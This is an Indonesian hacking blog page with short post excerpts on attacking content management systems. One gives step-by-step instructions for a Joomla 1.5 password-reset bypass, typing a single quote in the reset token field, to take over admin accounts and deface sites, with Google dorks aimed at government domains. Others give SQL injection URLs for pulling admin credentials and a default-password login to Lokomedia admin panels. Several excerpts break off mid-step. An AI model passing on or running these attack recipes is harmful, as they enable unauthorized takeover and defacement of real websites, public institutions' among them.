13.00
Zulhelmi Putra
Blog ane pindah ke sini aja...
liat ini yaah...
www.zone-cumi.us
Like juga page on facebook nya
Thanks..
Salam Cumi++
...
Kamis, 01 Desember 2011
Senin, 28 Februari 2011
Reset Joomla Password
=======================================
| Vuln Joomla, Mereset Password Admin |
=======================================
Jika admin belum lagi patch Vuln ini,, kamu sangat bertuah^_^
1) Find Error Site (pakcik Google.com) --> inurl:jos_users" inurl:"index.php
2) Forget A Password --> /index.php?option=com_user&view=reset
3) Its Find E-Mail --> (0x3a,username,0x3a,email,0x3a,password,0x3a,activation)4) Its Find Username --> (0x3a,username,0x3a,email,0x3a,password,0x3a,activation)
5) Its Find Admin Profile --> (username,0x3a,password)
6) Its Find Token --> (0x3a,username,0x3a,email,0x3a,0x3a,activation)
7) Its Find Login/Outlogin --> index.php?option=com_user&view=login
* inurl:"option=com_juser"
* its find error sites, Some Site :-
--> (0x3a,username,0x3a,email,0x3a,0x3a,activation)
-->...
Hacking Joomla 1.5
cara deface situs yang di buat pake joomla.
langkah2 :(Untuk joomla 1.5.X)
1. cari situs yang dibangun menggunakan joomla, minta bantuan paman google. kata kunci: inurl:option=com_user
atau
inurl:option=com_user site:go.id -->khusus untuk situs pemerintah
2. temukan situs target misalnya:
http://www.target.go.id/index.php?option=com_user&view=login&.....dst
3. ganti alamat tersebut sehingga menjadi
http://www.target.go.id/index.php?option=com_user&view=reset&layout=confirm
4. pada form input yang tampil berikan tanda token tanda ' (tanda petik tunggal) lalu klik kirim
5. jika berhasil maka akan keluar form untuk mereset password. masukan password baru sesuai yang kita inginkan
6. klik submit atau enter maka password default administrator joomla akan di rubah
7. langkah...
Joomla SQL Injections
SQL Injection Joomla 1.5
_____________________________________________________________
1. Google dork = allinurl:option=com_user |==========================
[x]. Cek Vuln
site/index.php?option=com_user&view=reset&layout=confirm
[x]. Cek UID n Pass Admin
site/index.php?option=com_docman&task=doc_details&gid=3&Itemid=1
site/index.php?option=com_docman&task=doc_details&gid=3&Itemid=2
site/index.php?option=com_docman&task=doc_details&gid=3&Itemid=3
"sampai muncul tabel informasi"
[x]. Login
Site/administrator
______________________________________________________________________
2. Google dork = allinurl:mod.php?mod=publisher |
==============================
[x]. Cek Vuln
site/mod.php?mod=publisher&op=viewcat&cid=2'
[x]....
Hacking CMS lokomedia
CMS Lokomedia atau bisa juga disebut dengan Lokomedia CMS, ada juga saya dengar orang-orang suku maya menyebutnya dengan Suka CMS, CMS Lokomedia ini adalah pemprograman web content management system (CMS) berbasis PHP dan MySQL. CMS ini murni buatan anak bangsa Indonesia, buatan Mas Lukmanul Hakim yang ditulis dan diabadikan dalam buku cetakkan dari Lokomedia yang akhirnya menjadi nama dari CMS ini.
ok langsung aja ya
pada google ketik dork :
Code:
inurl:semua-berita.html
pilih web yg akan di eksekusi
setelah dapat web yg akan di eksekusi cari login adminnya
dengan menambahkan /adminweb
contoh :
www.target.com/adminweb
coba masukkan username & password default'a
username : admin
password : admin
ingat tidak semua user dan password'a default
ok next
setelah masuk pada panel adminnya...
